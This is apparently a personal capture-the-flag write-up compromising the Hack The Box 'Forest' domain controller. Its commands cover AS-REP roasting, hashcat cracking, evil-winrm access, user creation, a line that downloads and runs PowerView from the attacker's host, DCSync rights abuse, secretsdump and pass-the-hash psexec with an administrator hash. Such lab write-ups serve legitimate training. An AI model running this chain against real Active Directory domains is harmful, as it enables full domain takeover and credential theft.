# FOREST | 10.10.10.161

## Initial Enumeration

    sudo nmap -v -T4 -sV -sC -oN nmap-initial 10.10.10.161
    
### Open Ports and Their Services

* 53 - domain - Simple DNS Plus
* 88 - kerberos-sec - KERBEROS
* 135 - msrpc - RPC
* 139/445 - SMB
* 139 - ldap - Active Directory
* 464 - kpasswd?
* 593 - ncacn_http - RPC
* 636 - tcpwrapped
* 3268 - ldap - Active Directory
* 3269 - tcpwrapped
* 5985 - wsman - WINRM
* 9389 - mc-nmf - .NET Message Framing

There are a number of ports above 47000 open as well but they are related to RPC so not that important.

### OS Discovery

Seems to be a Windows Server 2016 Standard 14393.

## Services Enumeration

A number of these services indicate to me that I am dealing with a Windows Domain Controller - when you have the SMB ports open in addition to LDAP and kerberos it's a good bet the machine in question is a DC.

Running 'enum4linux' gave me some usernames, even though it appeared the script was kinda broken:

![](img/enum4linux-users.png)

Right after this I removed it and installed 'enum4linux-ng' which is much improved.

So now I have some usernames I need to keep track of: sebastian, lucinda, andy, mark, santi, and a system service - svc-alfresco.

A reasonable thing to do in a real-world situation would be to sit on the network and monitor traffic from all these users, eventually you might grab a hash. But since this is a single machine and the users are not actually real, I could also do a password-spraying attack using 'crackmapexec'. I would give it the list of users and a password list and set it off and wait.

But that is probably not the way either; there are so many users and that complicates finding a password if we use a list like rockyou.

### SVC-ALFRESCO hash via ASREP-ROAST

One way in to a DC is to look more closely at the service (svc) accounts; they tend to be low-hanging fruit. The 'svc-alfresco' user is not a typical user for a human, it is there to run a service and in this case it does not require kerberos preauth. There is a tool called 'GetNPUsers.py' in the Impacket toolkit that I can use to query the DC and request a TGT from such a user:

    GetNPUsers.py -dc-ip 10.10.10.161 -request 'htb.local/'
    
And without any more prompting I get a result:

![](img/alfresco-tgt.png)

This is something that I can crack. So I will use hashcat on my server that has a GPU in order to get it done quick.

    hashcat -m 18200 hash <rockyou>
    
It took 0 seconds according to hashcat:

![](img/alfresco-pass.png)

## Foothold via EvilWin-rm

With the above creds, it's time to try to get some kind of access to the machine. The nmap scan showed port 5985 open, which we can connect to using EvilWin-rm.

    evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
    
This gets me a reverse Powershell on the machine!

![](img/alfresco-shell.png)

And oddly, the user flag is in this user's directory:

![](img/user-flag.png)

## User Enumeration

Now that we have a shell, I've done some enumeration. I spun up an SMB server using impacket, and moved over winpeas, PowerUp and WindowsEnum. These did not really give me any answers, and I knew that would probably be the case since we are dealing with a service account on a DC. The better way to do this is using a tool called "Bloodhound", which is a visual graphing tool to see connections in an Active Directory. You can imagine that in a real life situation the connections and links can get pretty convuluted and complex. With this box, I want to see how I can access admin privileges from the svc-alfresco account.

In order to grab the AD info I need to bring over another file called "SharpHound" - it comes in either an exe or ps1 file. Running this module enumerates the domain and puts it in a zip file.

    Invoke-Bloodhound -CollectionMethod All -Domain htb.local -LdapUsername svc-alfresco -LdapPassword s3rvice
    
Then I bring the zip file over to the Bloodhound instance running on my machine and it creates fancy graphs for me, visualizing the relationships and potential paths.

![](img/bloodhound.png)

At the top of that graph is my current user, and near the bottom is the administrator. The path shows that user svc-alfresco is a member of the 'Account Operators' group - members of this group can add and modify non-admin type users. So adding a user there gets us part of the way there.

    net user gibson r@z0rgirl /add /domain
    
There is another more secure way of adding a user that uses another recon tool called PowerView, but I have not added that module yet.

Now looking at the graph again, we see another group called 'Exchange Windows Permissions', and it has the "WriteDacl" permission:

![](img/writedacl.png)

So if I add the newly-created user to the 'Exchange Windows Permissions' group, then I can use the WriteDacl privs to grant myself DCSync privs, which would allow me to dump hashes.

    net group "Exchange Windows Permissions" /add gibson
    
Now I just wanna confirm the new user is in that group:

![](img/group-member.png)

OK, let's move on to performing the privesc.

## Privilege Escalation > PowerView > WriteDacl > DCSync > secretsdump > psexec

### PowerView, granting user DCSync

PowerView is a powershell module for network situational awareness on Windows domains. Once I import that module, I can use a series of secure commands to grant the user DCSync - which basically simulates the functions of a Domain Controller. Then I can dump all the hashes, including the administrator hash.

First I spin up a simple server to send over the module - `python -m http.server 8080`.

Then, in my evil-winrm session, I use a powershell command to pull over and load the module:

    IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19:8080/PowerView.ps1')
    
Next, I need to do a few Powershell commands to create secure credentials and put them in variables:

    $SecPassword = ConvertTo-SecureString 'r@z0rgirl' -AsPlainText -Force
    $Cred = New-Object System.Management.Automation.PSCredential('HTB\gibson', $SecPassword)

The last command grants the new user DCSync privs:

    Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity gibson -Rights DCSync
    
### secretsdump.py

This is a utility made by Impacket that can pull all kinds of juicy info from the DC if you have the right permissions, and the new user does.

    secretsdump.py -dc-ip 10.10.10.161 'htb.local/gibson:r@z0rgirl@10.10.10.161'
    
![](img/secretsdump.png)

We have all the hashes!

### psexec.py

We can use another Impacket tool to get a shell as NT AUTHORITY now. The amazing thing is that we do not even need to crack the hash, I can just pass it along!

    psexec.py htb.local/administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
    
And now I am root!

![](img/root-shell.png)

Let's grab the flag and get outta here!

![](img/root-flag.png)


## Conclusion

My first foray into Active Directory in a good long while, and it feels good. This box forced me to learn some new tricks, and to relearn some old ones. They'll all be useful when I do more AD-focused machines and networks.

Steps taken:

* Find usernames via enum4linux-ng, notice a service account
* Grab the svc-alfresco hash via ASREP-roasting, crack it with hashcat
* Get shell via Evil-Winrm
* Enumerate domain using Bloodhound to determine attack path - 'Account Operators' > 'Exchange Windows Permissions' > 'DCSync'
* Add new user to a group that has WriteDacl on domain
* Use PowerView to grant user DCSync privs
* Use secretsdump to dump hashes via new user privs
* Use psexec to log in as Administrator
